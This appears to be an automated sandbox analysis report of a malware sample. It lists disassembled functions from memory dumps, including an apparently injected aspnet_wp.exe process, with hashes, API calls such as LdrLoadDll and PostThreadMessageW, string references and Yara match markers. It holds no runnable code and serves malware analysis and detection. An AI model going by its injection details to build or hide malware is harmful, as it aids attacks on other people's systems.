Opcode ID: 4b2b566d6f506b58eb617a7d981a4dc0721865884826c04ba810ecbd94af40f9
Instruction ID: f596b96e97de8be4b75ffd3cda38703046ecebd40ed098bfe096b2a2a166a882
Opcode Fuzzy Hash: 4b2b566d6f506b58eb617a7d981a4dc0721865884826c04ba810ecbd94af40f9
Instruction Fuzzy Hash: C5F02B62B1AD4D0FDB9CAB5C68D54B467A0EB6822034003F7D82AC71DAEE1494434381

Function 00007FFD9B89AB29 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5e1f9d285e48c53e717f03b936bae9e2e7dcc837273f40a5e93f95609b09ba
Instruction ID: 9db90a48dd001045010f11dfcb6b8dd9d6abc265a501bb9a47d2dd85f6ea2e9d
Opcode Fuzzy Hash: cf5e1f9d285e48c53e717f03b936bae9e2e7dcc837273f40a5e93f95609b09ba
Instruction Fuzzy Hash: 45018C30919BCD4FCB46EF648C281A97FB0FF6A200B0604EBE868C72A2EA3459148751

Function 00007FFD9B89D145 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a5f0a4aef3741c38d84523e75d970a30fa89273011e4f84867b318cdf52e5d
Instruction ID: 3fdc9b98ea590fb56f85c8cb896271f76275bd688111eaa602f08965e3720224
Opcode Fuzzy Hash: 39a5f0a4aef3741c38d84523e75d970a30fa89273011e4f84867b318cdf52e5d
Instruction Fuzzy Hash: 82F08183B0F7C51FEB6357780835069AFA29F9B24070A81FBD4D88B2F3E8185A068311

Function 00007FFD9B8993F0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5771e3e5ab5f97b7acc1194e43ffcc7e8d3f9f61484bce3e0ff444b0b3037fbe
Instruction ID: a20eb409d3aa68dbd9071826cc7da42c544ea6b4dd6bed27c9720e1e081caf7f
Opcode Fuzzy Hash: 5771e3e5ab5f97b7acc1194e43ffcc7e8d3f9f61484bce3e0ff444b0b3037fbe
Instruction Fuzzy Hash: 70F0F63111CA4C5FC750E718D4149E673D5FF88304F4005BBE84DD71A5D939E940C782

Function 00007FFD9B89546D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac08a0007f4dded274b13c188bc1b6d0842008d6ffff78a5e873d1366f8b802b
Instruction ID: d573620b4eb70ff75c63267c9dc8b3567fc7d90018fb84c65d95daf558d95c6c
Opcode Fuzzy Hash: ac08a0007f4dded274b13c188bc1b6d0842008d6ffff78a5e873d1366f8b802b
Instruction Fuzzy Hash: 88E02242B1F81E03E7A532EF28AE1FD4785DFDC12675802B3E09CC22A2DC489C478280

Function 00007FFD9B8927FE Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a22a01688ad39c109e01034a5d52fd2e41a2bd48e9402e1fba4bae0ad26b04
Instruction ID: 8dd90ecd2d210219a48f2e6ddabadfe762dbe82ce8fb8a1670416ce5718c2d08
Opcode Fuzzy Hash: 24a22a01688ad39c109e01034a5d52fd2e41a2bd48e9402e1fba4bae0ad26b04
Instruction Fuzzy Hash: 85E0263260BA4C1BCA14AA9E7C608863FA9FA9D358F00012AF04CC2182E6129551C391

Function 00007FFD9B890870 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc883c55c466b8fcf8226a20d7f744d2617383daa5620b5688276458247ac4b5
Instruction ID: 026d7378b2993d9c4eabee4224dc2cbf65cc402183ca6f4fc257b8af42e9baa1
Opcode Fuzzy Hash: cc883c55c466b8fcf8226a20d7f744d2617383daa5620b5688276458247ac4b5
Instruction Fuzzy Hash: ECE0ED52A5F7E95EDB5723B51C794A03F609F07520B4E41FBC09CCB1E3D84D194A8792

Function 00007FFD9B89B965 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bdca630de5fabd2922dcf959e75c45a633cdd7b9badc4ec54004ac5939ec5e8
Instruction ID: b302dbbec855f1ccf9f42b143fc53be5158017289a5edec6e395ba08ef17a264
Opcode Fuzzy Hash: 5bdca630de5fabd2922dcf959e75c45a633cdd7b9badc4ec54004ac5939ec5e8
Instruction Fuzzy Hash: 81E08611F38E8E0AEB9CFB2458619B5B392EF5434470084B9901FC31CFFC28A8064200

Function 00007FFD9B8A6970 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26f4ec5deb0c206033b8693ff646fdf465a1572e251dfd90cea2044f5ac6b4a
Instruction ID: bf8d46ad49005210a18d6327cabcc9b51b3ef3336f3524ff7b2718e4426bb6da
Opcode Fuzzy Hash: b26f4ec5deb0c206033b8693ff646fdf465a1572e251dfd90cea2044f5ac6b4a
Instruction Fuzzy Hash: EED01221A28E1D4BEBBCBBB860556A5A1E0FB18310F410AB9D01AC36D9DF68A9854381

Function 00007FFD9B892930 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c07801474fdb47efc79587b74d1831b5ee976f001b927edc692f2f9eb97f99
Instruction ID: ea3f530499f8a0ea0868f4c212c34185a03887671b281b81acefe2d1b8c4a636
Opcode Fuzzy Hash: 07c07801474fdb47efc79587b74d1831b5ee976f001b927edc692f2f9eb97f99
Instruction Fuzzy Hash: B0C02B1171CC0E1FE650F68F68D11E853C1D34C5707100533C40EC2360CC084A830380

Function 00007FFD9B8A5FA0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea940ca4c1d4a8d6459f6c1feee26735a71f6a989a477cbec6e8348765ad35a
Instruction ID: 2a1f48740cbf52a8c8c014e4005532cf6ae336244fbb97256120272271f4e79c
Opcode Fuzzy Hash: dea940ca4c1d4a8d6459f6c1feee26735a71f6a989a477cbec6e8348765ad35a
Instruction Fuzzy Hash: A6B01221A1BC3C265A7C723D195D97A18D5CBDD711706017FF80DD32E6EC540D4242EA

Function 00007FFD9B894FFB Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8fbba2785666424090a6a55999b23663387c656b78d3682c4c76dff767b46e
Instruction ID: 4dd8d27271b99a4b943ba7260766bb035e240572535b642cf10ef147e09c4681
Opcode Fuzzy Hash: 0c8fbba2785666424090a6a55999b23663387c656b78d3682c4c76dff767b46e
Instruction Fuzzy Hash: AAA0021771F5AD84D622926978A42F97B018E8712E63D07FFC185550715A06111797A1

Non-executed Functions

Function 00007FFD9B8904FA Relevance: 9.1, Strings: 7, Instructions: 302COMMON

Download Yara Rule

Strings

N_^T, xrefs: 00007FFD9B890722
N_^U, xrefs: 00007FFD9B89072A
N_^], xrefs: 00007FFD9B89076A
N_^\, xrefs: 00007FFD9B890762
N_^^, xrefs: 00007FFD9B890772
N_^n, xrefs: 00007FFD9B8907BA
8K>, xrefs: 00007FFD9B89066E

Memory Dump Source

Source File: 00000000.00000002.1888694758.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_eNXDCIvEXI.jbxd

Similarity

API ID:
String ID: 8K>$N_^T$N_^U$N_^\$N_^]$N_^^$N_^n
API String ID: 0-102522154
Opcode ID: c951025f11a77fd6fd890bce6dd719afb38b5b92b5415a692aff27b0c918748a
Instruction ID: 105b40d61c7806fd26299ac7c62702be2bc3a7675988199db70f1e3f0f25664f
Opcode Fuzzy Hash: c951025f11a77fd6fd890bce6dd719afb38b5b92b5415a692aff27b0c918748a
Instruction Fuzzy Hash: 42711467B084368BC71AB6EDBC659EDB740DFC037A70446B7D398CA083A954608B97D1

Analysis Process: aspnet_wp.exePID: 7592, Parent PID: 7344COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	8%
Total number of Nodes:	138
Total number of Limit Nodes:	9

Executed Functions

Function 004175D3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417645

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction ID: 197bba766baae9ccb9378d914d43791810f684092e84117df41e3d66ad4e84ee
Opcode Fuzzy Hash: 8e002775716ddafbd47eb7ae43edb81b7bd9865612dd9b2aa705ee0c60120a3d
Instruction Fuzzy Hash: 77015EB1E0020DABDB10DAA5DC42FDEB378AB14318F0041AAE90897240F634EB448B95

Function 0042B113 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B147

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction ID: ecdc66760f4493d66e7f9721100b8e1ee1bc8025f612352e310ca33c1c5f3aed
Opcode Fuzzy Hash: ab3c5e634df23d89e276a079ed4ca5b525763aa1515c01312f02267f7250b466
Instruction Fuzzy Hash: C8E04F312002147BD210AA6ADC42FDB776CEFC5750F40401AFA0CA7282C67479118AF4

Function 055135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 055135CA

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3122aef6f8d5e140805a8abce07ed53368b0dafc252f4c53fff187e642065b0
Instruction ID: 19ef9d5b359ed4fe1c0a76806dc9f5c80ee5f74c093cb0d6bdd6f2cba6540b30
Opcode Fuzzy Hash: e3122aef6f8d5e140805a8abce07ed53368b0dafc252f4c53fff187e642065b0
Instruction Fuzzy Hash: F090023360561402D10071984555706105597D1211FA9C411A04245ACD8F958A5166A2

Function 05512DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05512DFA

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 937e89bd63da2e9fde08fc539f321afd7730d59501db800d6616be62464ab813
Instruction ID: 90a90f02dc9f7915510b43f8440f600b9f6665c30d1ef7e5c316513b5e8eb819
Opcode Fuzzy Hash: 937e89bd63da2e9fde08fc539f321afd7730d59501db800d6616be62464ab813
Instruction Fuzzy Hash: 3890023320151413D11171984545707005997D1251FD9C412A042459CD9F568A52A221

Function 05512C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05512C7A

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cf6dd41b627ff360b0c3b50dc97cdd283add6b083d8e03546e4cbd30b911d82
Instruction ID: 6e9ced079c43bd2d3a34b5acd8391ced8060524f8f9675f8c6506434c0fcfd50
Opcode Fuzzy Hash: 6cf6dd41b627ff360b0c3b50dc97cdd283add6b083d8e03546e4cbd30b911d82
Instruction Fuzzy Hash: 8E90023320159802D1107198844574A005597D1311F9DC411A442469CD8F9589917221

Function 05512B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05512B6A

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ef430a379127b06b0119f66ba77b5f0e2183b50dc100450ed08a947aec3f8e0
Instruction ID: 336f3da30891f7c0681a863cc2b2518ec38316b2862d3168e26aee02f5207c12
Opcode Fuzzy Hash: 2ef430a379127b06b0119f66ba77b5f0e2183b50dc100450ed08a947aec3f8e0
Instruction Fuzzy Hash: 7590026320251003410571984455616405A97E1211B99C021E10145D4DCE2589916225

Function 00413BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0
2E85-1J297, xrefs: 00413CA7, 00413CAA

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
Instruction ID: fac5187bc1ebd0f532d1b5a8304cfaa8bfc79ea26e974f1851d4e8212ffd96c9
Opcode Fuzzy Hash: 9ef06354370753566720ce0641794f4365d44dc161e8c80df766a471b4a826e7
Instruction Fuzzy Hash: F8110A71E4421875DB119BA1DC02FDF7B7C9B81750F044256BE14BB2C1E6B8570687E9

Function 00413C1D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0
2E85-1J297, xrefs: 00413CA7, 00413CAA

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
Instruction ID: 7d834f13cbc57e5c5536fcf78db2658f70786329c2f6e1f07eabf56f68c91956
Opcode Fuzzy Hash: b17fdb8d00fd9dbf1a21d31b589a756d2dd2dcbfb6b92dee265ea2bf3424112c
Instruction Fuzzy Hash: AC11A571E4035876EB21AA91DC02FDF7B7C9F81754F04806AFE047B281E6B857068BE9

Function 00413C23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 00413CA0

Strings

2E85-1J297, xrefs: 00413C93, 00413C9F, 00413CB0
2E85-1J297, xrefs: 00413CA7, 00413CAA

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 2E85-1J297$2E85-1J297
API String ID: 1836367815-2292425170
Opcode ID: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
Instruction ID: 1a282b7d84d996dac4ab3bb013e31c2a308f112e6a4d465b74d45ac7f165523c
Opcode Fuzzy Hash: 40ac6464cc02b0a17f22d6a0f9b39d8a91636f7c6e9eedb624e9262c98edf3cc
Instruction Fuzzy Hash: 51018871E4425876DB119B91DC02FDF7B7C9F41754F044066FE047B281E6B8570687E9

Function 0042B463 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,787DA667,00000007,00000000,00000004,00000000,00416EB6,000000F4,?,?,?,?,?), ref: 0042B4A2

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction ID: 29216401f83c999bafc4889d1ef9cf5b8ded11cd2c7a16928c4b59d44ebfb468
Opcode Fuzzy Hash: 6046a2a276af6c31bbf028b166cbe6262e2fbb1c8e018c6e84f56d1176c5d109
Instruction Fuzzy Hash: BAE039712002047BD614EE59EC45FAB37ACEF89714F004419BA08A7282D670B9208BB5

Function 0042B413 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DDDB,?,?,00000000,?,0041DDDB,?,?,?), ref: 0042B452

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction ID: 221cd86b377e2f50623e42edb0e4ae3167af5ca3d055178b3f991e940f0c7b33
Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
Instruction Fuzzy Hash: 53E039B12042047BD610EA99EC41FAB37ACEB88710F00801AB908A7282CA70BD208BB4

Function 0042B4B3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,80D9C676,?,?,80D9C676), ref: 0042B4E7

Memory Dump Source

Source File: 00000005.00000002.1834831653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_wp.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
Instruction ID: 3649d5567d2ad1bba1c78f4e41195c4783f723823fa94b3f9b3b2a4a005bfd28
Opcode Fuzzy Hash: 2d6778b99e822911c47e8daccf314cfd6029762112306eba4285f25f923e9aa8
Instruction Fuzzy Hash: D2E04F356003147BD510AA5ADC45F9B775CDBC9714F40406AFA08A7281C6B079118BE4

Function 05512C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05512C24

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce26955cb7533b55cf5f502c41de805bcd7979f8c3edbbb8b98a084963751263
Instruction ID: 85ea073dbeccfd482e260a4646d5c1f49e6082558c1c16239d5950e128658015
Opcode Fuzzy Hash: ce26955cb7533b55cf5f502c41de805bcd7979f8c3edbbb8b98a084963751263
Instruction Fuzzy Hash: D7B09B739015D5D6EA11E7614609B177D5177D1715F59C061D3030685E4B38C1D1E275

Non-executed Functions

Function 05508620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

undeleted critical section in freed memory, xrefs: 0554542B
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 055454E2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0554540A, 05545496, 05545519
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 055454CE
Thread is in a state in which it cannot own a critical section, xrefs: 05545543
double initialized or corrupted critical section, xrefs: 05545508
Critical section address., xrefs: 05545502
Address of the debug info found in the active list., xrefs: 055454AE, 055454FA
8, xrefs: 055452E3
Thread identifier, xrefs: 0554553A
Critical section debug info address, xrefs: 0554541F, 0554552E
Critical section address, xrefs: 05545425, 055454BC, 05545534
corrupted critical section, xrefs: 055454C2
Invalid debug info address of this critical section, xrefs: 055454B6

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 7d054b475c55911f848c5318b1911e135649d1d1cdf618ad4598cebc593cb24b
Instruction ID: c752170a756dd8269a9f1c4f9d65633413db77afedac13e674e375fb7fe67022
Opcode Fuzzy Hash: 7d054b475c55911f848c5318b1911e135649d1d1cdf618ad4598cebc593cb24b
Instruction Fuzzy Hash: 82818EB1A40358EFEB50CF95C845FEEBBB9BB48714F20415AF505B7280D3B5A944DBA0

Function 05569179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

%s\%ld\%s, xrefs: 0556948D
%s\%u-%u-%u-%u, xrefs: 05569422
\AppContainerNamedObjects, xrefs: 055694AB, 055694B9
AppContainerNamedObjects, xrefs: 0556946E, 055694D6
\BaseNamedObjects, xrefs: 0556949E
Global\Session\%ld%s, xrefs: 055694C5
BaseNamedObjects, xrefs: 05569477, 0556947C
\Sessions, xrefs: 05569488

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 96e1b1b59b48a44fc431361a22f52388b1f1860fbc71826658c7dde6014513af
Instruction ID: ac16c6c7e7ecd447080a771ff3b1713ada7e03753218a6cfce4eabb04a702814
Opcode Fuzzy Hash: 96e1b1b59b48a44fc431361a22f52388b1f1860fbc71826658c7dde6014513af
Instruction Fuzzy Hash: D0D1C3B2908395AFD721DE54C845FABB7F8BF84B14F044A2EFA84A7150E770D94487D2

Function 054CD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 054CD2AF
@, xrefs: 054CD313
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 054CD262
@, xrefs: 054CD0FD
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 054CD2C3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 054CD0CF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 054CD146
Control Panel\Desktop\LanguageConfiguration, xrefs: 054CD196

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: c9c48f7377ea82ccb62a346b263d05ccaaf44c4dc1b67d41fd1edc7f4f1246cb
Instruction ID: ce3b1deeb82727a898c42364ad7933cddb0abcdd5c598c0bb4db44db960aaf5f
Opcode Fuzzy Hash: c9c48f7377ea82ccb62a346b263d05ccaaf44c4dc1b67d41fd1edc7f4f1246cb
Instruction Fuzzy Hash: 39A1AD75A083469FE761CF21C484BABBBE9BBC4715F00492EF98996240E774D908CF93

Function 054CF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 0552E291
(!TrailingUCR), xrefs: 0552E3A9
(UCRBlock != NULL), xrefs: 0552DF6F
HEAP[%wZ]: , xrefs: 0552DF57, 0552E09B, 0552E279, 0552E391
HEAP: , xrefs: 0552DF64, 0552E0A8, 0552E286, 0552E39E
